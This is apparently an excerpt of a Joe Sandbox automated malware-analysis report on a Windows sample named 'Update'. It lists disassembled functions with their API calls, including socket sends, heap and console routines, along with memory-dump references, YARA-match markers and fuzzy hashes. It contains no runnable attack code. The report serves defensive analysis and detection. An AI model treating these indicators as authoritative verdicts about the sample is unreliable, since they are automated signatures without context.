HeapFree.KERNEL32(00000000), ref: 037FDF03

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: Heap_free$FreeProcess
String ID:
API String ID: 1072109031-0
Opcode ID: f09a0a12489992da6b6395a83573dc4b826148d6b67936c1562925509313e391
Instruction ID: 606d150d2127e7910ef54d575bcbf0930f5b85bde66b41a51ae987c4f91c2f62
Opcode Fuzzy Hash: f09a0a12489992da6b6395a83573dc4b826148d6b67936c1562925509313e391
Instruction Fuzzy Hash: EA114675600B009FD630DB64CC49B67B3AABB84710F18891CE69A87B84DB74F842CB91

Function 037F3BF0 Relevance: 6.1, APIs: 4, Instructions: 58networkCOMMON

Download Yara Rule

APIs

WSAEventSelect.WS2_32(?,037F3ABB,00000023), ref: 037F3C02
WSAGetLastError.WS2_32 ref: 037F3C0D
send.WS2_32(?,00000000,00000000,00000000), ref: 037F3C58
WSAGetLastError.WS2_32 ref: 037F3C63

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: ErrorLast$EventSelectsend
String ID:
API String ID: 259408233-0
Opcode ID: ea3a159da2137ada289b0ce88db47120ba95ae45a4e870751b66305fc086e7c2
Instruction ID: dbe032c2e3bc3dc14277beae91b94e15afbf40252d4648c4dbee71d53c843550
Opcode Fuzzy Hash: ea3a159da2137ada289b0ce88db47120ba95ae45a4e870751b66305fc086e7c2
Instruction Fuzzy Hash: A4115ABA610B009FE720DF79E888A57B6EDBBC8724F110A6DE666C7790D731E400CB50

Function 10003BF0 Relevance: 6.1, APIs: 4, Instructions: 58networkCOMMON

Download Yara Rule

APIs

WSAEventSelect.WS2_32(10003ABB,00000001,00000023), ref: 10003C02
WSAGetLastError.WS2_32 ref: 10003C0D
send.WS2_32(00000001,00000000,00000000,00000000), ref: 10003C58
WSAGetLastError.WS2_32 ref: 10003C63

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: ErrorLast$EventSelectsend
String ID:
API String ID: 259408233-0
Opcode ID: 2fb520420096818f033348b16f08926af932f2b6a4c880f47cd01b5ee34dc08f
Instruction ID: 2cb4a202ed201c3bbb9feb76d4ba786ae7603a0bc4fad51836a507335b835d1f
Opcode Fuzzy Hash: 2fb520420096818f033348b16f08926af932f2b6a4c880f47cd01b5ee34dc08f
Instruction Fuzzy Hash: 19116AB6600710ABE320CB79C8C8A47B7E9FB88750B014A2DE956C7690C732E8008B50

Function 0380BDEB Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 0380BE11

Part of subcall function 0380BC3D: __fltout2.LIBCMT ref: 0380BC68

__cftog_l.LIBCMT ref: 0380BE37
__cftoe_l.LIBCMT ref: 0380BE69

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction ID: 4a49ecca680f2e28a4ac268f39e1e793a8abdd88217117836e4ac9e20ee24e7a
Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction Fuzzy Hash: 1B114C7600014EBBCF579EC8CC16CEE3F67BB18654B588495FA28991B0C736C9B1AB91

Function 1000F361 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 1000F387

Part of subcall function 1000F1B3: __fltout2.LIBCMT ref: 1000F1DE

__cftog_l.LIBCMT ref: 1000F3AD
__cftoe_l.LIBCMT ref: 1000F3DF

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction ID: 466f4f1e7ae25f0961f396d3557a49c78803b8d6a6677ae74fd306ec2772594f
Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction Fuzzy Hash: 08114E3640018AFBDF129E84CC41CEE3F62FB083A4B558419FE6859439C336DAB1BB81

Function 037F41E0 Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(037F4FB5,037F4E55,037F42BE,00000000,?,?,037F4E55,?,?,?,?,00000000,000000FF), ref: 037F41E8
LeaveCriticalSection.KERNEL32(037F4FB5,?,?,?,00000000,000000FF), ref: 037F41F6
LeaveCriticalSection.KERNEL32(037F4FB5), ref: 037F4257
SetEvent.KERNEL32(8520468B), ref: 037F4272

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$EnterEvent
String ID:
API String ID: 3394196147-0
Opcode ID: df976a2efb607993c0e328ca0c62afbd706ad8012591192cca994208acad4d8b
Instruction ID: 40c1d8544f8c66c1b36c90e10fa1e69945a481918f3e7e5acb39638b0934c074
Opcode Fuzzy Hash: df976a2efb607993c0e328ca0c62afbd706ad8012591192cca994208acad4d8b
Instruction Fuzzy Hash: 771103B0601B059FD724CF79D588A97FBE9FF48300B15896DE56E87211EB31E801CB00

Function 037F4B00 Relevance: 6.0, APIs: 4, Instructions: 45timeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM(00000001,?,00000001,?,037F3C4F,?,?,00000001), ref: 037F4B15
InterlockedIncrement.KERNEL32(00000001), ref: 037F4B24
InterlockedIncrement.KERNEL32(00000001), ref: 037F4B31
timeGetTime.WINMM(?,037F3C4F,?,?,00000001), ref: 037F4B48

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: IncrementInterlockedTimetime
String ID:
API String ID: 159728177-0
Opcode ID: fba20ed9d22a888a11fe15228172af58016cf689d941305767e0a1e5a56f3363
Instruction ID: 743927f5b7ee0bb9ec31b24a3d20666b33143d55db564b628012e8337fd023dc
Opcode Fuzzy Hash: fba20ed9d22a888a11fe15228172af58016cf689d941305767e0a1e5a56f3363
Instruction Fuzzy Hash: F801C8B56007059FC720EFBAD88098AFBECBF58650700892AE549C7710E774E5448FA0

Function 10004AE0 Relevance: 6.0, APIs: 4, Instructions: 45timeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM(00000001,?,00000001,?,10003C4F,?,?,00000001), ref: 10004AF5
InterlockedIncrement.KERNEL32(?), ref: 10004B04
InterlockedIncrement.KERNEL32(?), ref: 10004B11
timeGetTime.WINMM(?,00000001,?,10003C4F,?,?,00000001), ref: 10004B28

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: IncrementInterlockedTimetime
String ID:
API String ID: 159728177-0
Opcode ID: ecc8ba4fb7d149bb0e17cd39b255899764ae90b27ed04fa3fbe9ab010b97b0d8
Instruction ID: 0a1d15bd5f988d4bea10877f224db5579cb700bf5039280ae9249a62ae1a06e8
Opcode Fuzzy Hash: ecc8ba4fb7d149bb0e17cd39b255899764ae90b27ed04fa3fbe9ab010b97b0d8
Instruction Fuzzy Hash: E20116B5601705AFD720DFBAC88098AFBF9EF4C650701892EE549CB611E771EA448FE0

Function 037F3660 Relevance: 6.0, APIs: 4, Instructions: 42timeCOMMON

Download Yara Rule

APIs

CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 037F3667
_free.LIBCMT ref: 037F369C

Part of subcall function 037FF639: RtlFreeHeap.NTDLL(00000000,00000000,?,03803E4C,00000000,?,03801EEF,00000003,03801CFF,?,03808E82,00000011,00000000,?,03803F06,0000000D), ref: 037FF64F
Part of subcall function 037FF639: GetLastError.KERNEL32(00000000,?,03803E4C,00000000,?,03801EEF,00000003,03801CFF,?,03808E82,00000011,00000000,?,03803F06,0000000D,03816340), ref: 037FF661

_malloc.LIBCMT ref: 037F36D7
_memset.LIBCMT ref: 037F36E5

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: CreateErrorFreeHeapLastTimerWaitable_free_malloc_memset
String ID:
API String ID: 3340475617-0
Opcode ID: acfb7257c80da7d5c59e30a83a84d273d677f606fd9ea5a0ecdc4dcd33c0f3dc
Instruction ID: 2478962aa40d47b1207c2e41da064dc5994b150ae64274c40ac5dbf5bd21aab4
Opcode Fuzzy Hash: acfb7257c80da7d5c59e30a83a84d273d677f606fd9ea5a0ecdc4dcd33c0f3dc
Instruction Fuzzy Hash: 7501D6F5900B04DFE360DF7A9885B97BBE9FB85214F14482EE5AE87301DA31A8458F20

Function 10003660 Relevance: 6.0, APIs: 4, Instructions: 42timeCOMMON

Download Yara Rule

APIs

CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 10003667
_free.LIBCMT ref: 1000369C

Part of subcall function 10006E49: HeapFree.KERNEL32(00000000,00000000,?,10009900,00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F), ref: 10006E5F
Part of subcall function 10006E49: GetLastError.KERNEL32(00000000,?,10009900,00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F,00000000), ref: 10006E71

_malloc.LIBCMT ref: 100036D7
_memset.LIBCMT ref: 100036E5

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: CreateErrorFreeHeapLastTimerWaitable_free_malloc_memset
String ID:
API String ID: 3340475617-0
Opcode ID: 391cc94a781e731dd4c35f2c6748f9c6c817e77f81a08f70d75bdfa6bee01c3e
Instruction ID: 20f9dc9dccf48a4f32705b4407c0702e844904f7cd1830b54ea69625ce22a711
Opcode Fuzzy Hash: 391cc94a781e731dd4c35f2c6748f9c6c817e77f81a08f70d75bdfa6bee01c3e
Instruction Fuzzy Hash: 8401DEF5900B44DFE360CF7AD881B97B7E9EB45254F11882EE5AE87302DA31A8048F60

Function 037FCD80 Relevance: 6.0, APIs: 4, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 037F1420: HeapFree.KERNEL32(?,00000000,?,?,?,037F40B1,?,00000000,037F4039,?,74DEDFA0,037F3648), ref: 037F143D
Part of subcall function 037F1420: _free.LIBCMT ref: 037F1459

HeapDestroy.KERNEL32(00000000), ref: 037FCD93
HeapCreate.KERNEL32(?,?,?), ref: 037FCDA5
_free.LIBCMT ref: 037FCDB5
HeapDestroy.KERNEL32 ref: 037FCDE2

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: Heap$Destroy_free$CreateFree
String ID:
API String ID: 4097506873-0
Opcode ID: 0851b0ebaf45714bf5976b4085f68fe32a7d7d6182cc81334f284600a90294f9
Instruction ID: 49a6047fbb08fc513b48bd53fd0c12f049e05f9b96cc68a7a7f874e6cec86236
Opcode Fuzzy Hash: 0851b0ebaf45714bf5976b4085f68fe32a7d7d6182cc81334f284600a90294f9
Instruction Fuzzy Hash: F1F037B9100B06AFD310EF24E808B5BFBB8FF84710F144918E95997744DB74E891CBA0

Function 10006490 Relevance: 6.0, APIs: 4, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 10001420: HeapFree.KERNEL32(?,00000000,?,?,?,100040B1,?,00000000,10004039,?,74DEDFA0,10003648), ref: 1000143D
Part of subcall function 10001420: _free.LIBCMT ref: 10001459

HeapDestroy.KERNEL32(00000000), ref: 100064A3
HeapCreate.KERNEL32(?,?,?), ref: 100064B5
_free.LIBCMT ref: 100064C5
HeapDestroy.KERNEL32 ref: 100064F2

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: Heap$Destroy_free$CreateFree
String ID:
API String ID: 4097506873-0
Opcode ID: 93927da24fa2970c59e2ba275e76658273f805c74c1ab82e82c9513be7b43463
Instruction ID: e941b2b67b7b789b38fb12685925c4a960f3707d906db07a4445c0daadc26747
Opcode Fuzzy Hash: 93927da24fa2970c59e2ba275e76658273f805c74c1ab82e82c9513be7b43463
Instruction Fuzzy Hash: 28F032B9600702ABE710CF65D848B53B7FAFF88791F218528E86987244DB35F851CBA0

Function 6CABB1F7 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,6CAB07FB,00000000,00000000,00000000,?,6CABA519,00000000,00000001,00000000,?,?,6CAB19B8,?,00000000,00000000), ref: 6CABB20E
GetLastError.KERNEL32(?,6CABA519,00000000,00000001,00000000,?,?,6CAB19B8,?,00000000,00000000,?,?,?,6CAB12FE,?), ref: 6CABB21A

Part of subcall function 6CABB26B: CloseHandle.KERNEL32(FFFFFFFE,6CABB22A,?,6CABA519,00000000,00000001,00000000,?,?,6CAB19B8,?,00000000,00000000,?,?), ref: 6CABB27B

___initconout.LIBCMT ref: 6CABB22A

Part of subcall function 6CABB24C: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6CABB1E8,6CABA506,?,?,6CAB19B8,?,00000000,00000000,?), ref: 6CABB25F

WriteConsoleW.KERNEL32(00000000,6CAB07FB,00000000,00000000,?,6CABA519,00000000,00000001,00000000,?,?,6CAB19B8,?,00000000,00000000,?), ref: 6CABB23F

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: f0172804bddb4a7a05225980464872e78d39a760b42468dea8ffcc7fbb410488
Instruction ID: a7a0e949e9c9e93616e3abc229cb0fb476250c0eeefde24b163e61a6f6a0bcbe
Opcode Fuzzy Hash: f0172804bddb4a7a05225980464872e78d39a760b42468dea8ffcc7fbb410488
Instruction Fuzzy Hash: D2F01C36600625BBCF162FE6DC489CE3F7AFB0B3A4B048111FA1895620C63289629B90

Function 6CAB0A88 Relevance: 6.0, APIs: 4, Instructions: 27COMMON

Download Yara Rule

APIs

ReadConsoleInputW.KERNEL32(0000000C,6CAC9D90,6CAA3444,00000000,?,6CAA34C8,00000000,00000001,?,6CAC9DB0,00000038,6CAA3444,6CAC9D90,0000000C,6CA81B30), ref: 6CAB0A9D
GetLastError.KERNEL32(?,6CAA34C8,00000000,00000001,?,6CAC9DB0,00000038,6CAA3444,6CAC9D90,0000000C,6CA81B30), ref: 6CAB0AA9

Part of subcall function 6CAB0C1D: CloseHandle.KERNEL32(FFFFFFFF,6CAB0B05,?,6CAA36DC,0000000C,66666667,?,?,6CAA33F4,6CAC9D70,0000000C,6CA81B27), ref: 6CAB0C2D

___initconin.LIBCMT ref: 6CAB0AB9

Part of subcall function 6CAB0BFE: CreateFileW.KERNEL32(CONIN$,C0000000,00000003,00000000,00000003,00000000,00000000,6CAB0A79,6CAA36CB,66666667,?,?,6CAA33F4,6CAC9D70,0000000C,6CA81B27), ref: 6CAB0C11

ReadConsoleInputW.KERNEL32(0000000C,6CAC9D90,6CAA3444,?,6CAA34C8,00000000,00000001,?,6CAC9DB0,00000038,6CAA3444,6CAC9D90,0000000C,6CA81B30), ref: 6CAB0ACD

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: ConsoleInputRead$CloseCreateErrorFileHandleLast___initconin
String ID:
API String ID: 838051604-0
Opcode ID: 98709031be726f92d8a8f1a251c79f951990ea69abec23e22f97466218e98476
Instruction ID: b2e2a6da8db8a004bfda3f7302dcb69b9480e157bdcda4f3daa0e9d938a68c5f
Opcode Fuzzy Hash: 98709031be726f92d8a8f1a251c79f951990ea69abec23e22f97466218e98476
Instruction Fuzzy Hash: 9EF0653610125ABBCF161FE5CD048993F7AFB493687058154FA29F2220CF32C9A1DBC0

Function 6CA9D1C7 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000001), ref: 6CA9D1D9
GetCurrentThreadId.KERNEL32 ref: 6CA9D1E8
GetCurrentProcessId.KERNEL32 ref: 6CA9D1F1
QueryPerformanceCounter.KERNEL32(?), ref: 6CA9D1FE

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 768c71dd0434c2fbcd8b2f4bf1103447256a92eb2082f72d6a5833ce0f7b04e7
Instruction ID: 48ac867887fd1d3f89f2916ec8b227044834a774e9d80b4f4bf067917034f774
Opcode Fuzzy Hash: 768c71dd0434c2fbcd8b2f4bf1103447256a92eb2082f72d6a5833ce0f7b04e7
Instruction Fuzzy Hash: 07F06275D1020DEBCF04DFB4C68999EBBF4EF1D200B918596A512E7140E730AB85DF50

Function 6CAB0ADA Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetNumberOfConsoleInputEvents.KERNEL32(?,?,?,6CAA36DC,0000000C,66666667,?,?,6CAA33F4,6CAC9D70,0000000C,6CA81B27), ref: 6CAB0AE9
GetLastError.KERNEL32(?,6CAA36DC,0000000C,66666667,?,?,6CAA33F4,6CAC9D70,0000000C,6CA81B27), ref: 6CAB0AF5

Part of subcall function 6CAB0C1D: CloseHandle.KERNEL32(FFFFFFFF,6CAB0B05,?,6CAA36DC,0000000C,66666667,?,?,6CAA33F4,6CAC9D70,0000000C,6CA81B27), ref: 6CAB0C2D

___initconin.LIBCMT ref: 6CAB0B05

Part of subcall function 6CAB0BFE: CreateFileW.KERNEL32(CONIN$,C0000000,00000003,00000000,00000003,00000000,00000000,6CAB0A79,6CAA36CB,66666667,?,?,6CAA33F4,6CAC9D70,0000000C,6CA81B27), ref: 6CAB0C11

GetNumberOfConsoleInputEvents.KERNEL32(?,?,6CAA36DC,0000000C,66666667,?,?,6CAA33F4,6CAC9D70,0000000C,6CA81B27), ref: 6CAB0B13

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: ConsoleEventsInputNumber$CloseCreateErrorFileHandleLast___initconin
String ID:
API String ID: 1600138625-0
Opcode ID: 7b637d559fff3c31a35a55036f302b04b397ea54ec648646dc524ccd95de803d
Instruction ID: cfd799bd6464756349b2f885efb9e7f7bc54b3b0561c0c73919ec8c16a2d2604
Opcode Fuzzy Hash: 7b637d559fff3c31a35a55036f302b04b397ea54ec648646dc524ccd95de803d
Instruction Fuzzy Hash: 92E048316002597B8F162BAAC9489893E79EB067BD3054120F905F3610CB318DD2D7D0

Function 6CAB0BB8 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

SetConsoleMode.KERNEL32(0000000C,00000000,?,6CAA34AF,00000000,?,6CAC9DB0,00000038,6CAA3444,6CAC9D90,0000000C,6CA81B30), ref: 6CAB0BC7
GetLastError.KERNEL32(?,6CAA34AF,00000000,?,6CAC9DB0,00000038,6CAA3444,6CAC9D90,0000000C,6CA81B30), ref: 6CAB0BD3

Part of subcall function 6CAB0C1D: CloseHandle.KERNEL32(FFFFFFFF,6CAB0B05,?,6CAA36DC,0000000C,66666667,?,?,6CAA33F4,6CAC9D70,0000000C,6CA81B27), ref: 6CAB0C2D

___initconin.LIBCMT ref: 6CAB0BE3

Part of subcall function 6CAB0BFE: CreateFileW.KERNEL32(CONIN$,C0000000,00000003,00000000,00000003,00000000,00000000,6CAB0A79,6CAA36CB,66666667,?,?,6CAA33F4,6CAC9D70,0000000C,6CA81B27), ref: 6CAB0C11

SetConsoleMode.KERNEL32(0000000C,?,6CAA34AF,00000000,?,6CAC9DB0,00000038,6CAA3444,6CAC9D90,0000000C,6CA81B30), ref: 6CAB0BF1

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: ConsoleMode$CloseCreateErrorFileHandleLast___initconin
String ID:
API String ID: 3067319862-0
Opcode ID: 3e7349d15a8d79a644f5b5f9e5d79694ba557642a9f11a8cea55cabd1552072e
Instruction ID: 6cf1cdb49e4104104f618266adfb2e4292deca3c6e6cbbe619fe88acbf09e3e4
Opcode Fuzzy Hash: 3e7349d15a8d79a644f5b5f9e5d79694ba557642a9f11a8cea55cabd1552072e
Instruction Fuzzy Hash: D8E086326403666B8F152BE6CD089893E79EB063BD3088120F909E3610CF318DD29BD0

Function 6CAB0B72 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(0000000C,?,?,6CAA34A7,?,6CAC9DB0,00000038,6CAA3444,6CAC9D90,0000000C,6CA81B30), ref: 6CAB0B81
GetLastError.KERNEL32(?,6CAA34A7,?,6CAC9DB0,00000038,6CAA3444,6CAC9D90,0000000C,6CA81B30), ref: 6CAB0B8D

Part of subcall function 6CAB0C1D: CloseHandle.KERNEL32(FFFFFFFF,6CAB0B05,?,6CAA36DC,0000000C,66666667,?,?,6CAA33F4,6CAC9D70,0000000C,6CA81B27), ref: 6CAB0C2D

___initconin.LIBCMT ref: 6CAB0B9D

Part of subcall function 6CAB0BFE: CreateFileW.KERNEL32(CONIN$,C0000000,00000003,00000000,00000003,00000000,00000000,6CAB0A79,6CAA36CB,66666667,?,?,6CAA33F4,6CAC9D70,0000000C,6CA81B27), ref: 6CAB0C11

GetConsoleMode.KERNEL32(0000000C,?,6CAA34A7,?,6CAC9DB0,00000038,6CAA3444,6CAC9D90,0000000C,6CA81B30), ref: 6CAB0BAB

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

